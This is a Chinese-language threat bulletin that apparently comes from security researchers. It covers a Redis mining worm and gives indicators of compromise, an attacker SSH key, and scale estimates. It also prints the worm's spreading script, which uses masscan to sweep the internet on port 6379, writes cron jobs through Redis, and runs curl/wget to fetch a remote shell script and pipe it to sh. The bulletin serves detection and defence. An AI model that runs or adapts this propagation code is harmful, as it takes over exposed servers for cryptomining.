威胁快讯:一个Redis.Miner

IoC

下载服务器

159.89.190.243  
img.namunil.com  
cdn.namunil.com  

下载URL

hxxp://img.namunil.com/ash.php  
hxxp://img.namunil.com/bsh.php  
hxxp://img.namunil.com/rsh.php  
hxxp://cdn.namunil.com/ash.php  
hxxp://cdn.namunil.com/bsh.php  
hxxp://cdn.namunil.com/ins.php  
hxxp://cdn.namunil.com/pgp.php  
hxxp://cdn.namunil.com/rsh.php  
hxxp://cdn.namunil.com/sh.php  

挖矿程序

hxxp://img.namunil.com/dump.db  
hxxp://cdn.namunil.com/dump.db  

ssh登录私钥
/root/.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX  

规模估计

  • 扫描规模:端口6379 ,排名14(24小时内独立来源IP 673个)
  • 下载服务器排名还很低,远低于一百万名:
    • 0.327100 401126302 2018-03-23 cdn.namunil.com
    • 0.572953 174202964 2018-03-23 img.namunil.com
  • 挖矿获利:不明,所使用的矿池 z.chakpools.com 并非知名矿池,没有应答

蠕虫式传播

利用 redis 本地漏洞投入载荷,扫描过程中使用的 masscan 是恶意代码自行下载编译的。

echo 'config set dbfilename "backup.db"' > .dat  
echo 'save' >> .dat  
echo 'flushall' >> .dat  
echo 'set jmTIabkD "\n*/2 * * * * curl http://cdn.namunil.com/sh.php|sh\n"' >> .dat  
echo 'set yCEpdj "\n*/4 * * * * wget -O- http://cdn.namunil.com/sh.php|sh\n"' >> .dat  
echo 'set cNaGUd "\n*/5 * * * * /usr/bin/curl -qs http://cdn.namunil.com/sh.php|/bin/sh\n"' >> .dat  
echo 'set mKjzHoR "\n*/10 * * * * /usr/bin/wget -q -O- http://cdn.namunil.com/sh.php|/bin/sh\n"' >> .dat  
echo 'config set dir "/var/spool/cron"' >> .dat  
echo 'config set dbfilename "root"' >> .dat  
echo 'save' >> .dat  
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat  
echo 'save' >> .dat  
iptables -A INPUT -p tcp --dport 60000 -j DROP

masscan --banners --no-show open --shard 18499/20000 --source-port 60000 --hello-string[6379] "KjQNCiQ2DQpjb25maWcNCiQzDQpzZXQNCiQzDQpkaXINCiQxNQ0KL3Zhci9zcG9vbC9jcm9uDQo=" --max-rate 10000 -p6379 0.0.0.0/0 --exclude 255.255.255.255 2>/dev/null -oG - | awk '/+OK/ {print $2, $5}' | sort | uniq > .r1  
while read -r h p; do  
cat .dat | redis-cli -h $h -p $p --raw > /dev/null 2>&1 &  
done < .r1  

恶意代码与近期 6379 端口扫描之间的同源关系证明

恶意代码中有以下masscan hello-string,并且来源端口限定为 6000:

$echo KjQNCiQ2DQpjb25maWcNCiQzDQpzZXQNCiQzDQpkaXINCiQxNQ0KL3Zhci9zcG9vbC9jcm9uDQo= | base64 -d
*4
$6
config  
$3
set  
$3
dir  
$15
/var/spool/cron

这与我们近期在 6379 上看到的扫描载荷是一致的

2018-03-23 14:23:54    redis    sip=111.231.121.59    dip=-    sport=60000    dport=65535    proto=tcp    tcp.payload=eJzSMuHlUjHj5UrOz0vLTOflUjHm5SpOLYEwUjKLeLlUDE15ufTLEov0iwvy83P0k4vy83i5AAEAAP//WKwNdg==    src=hp  
$ fes -X eJzSMuHlUjHj5UrOz0vLTOflUjHm5SpOLYEwUjKLeLlUDE15ufTLEov0iwvy83P0k4vy83i5AAEAAP//WKwNdg==
>>>sha1: 38472e9bfbf6148a9e887ae8196b6b2d2e6005e0    plen:56
*4
$6
config  
$3
set  
$3
dir  
$15
/var/spool/cron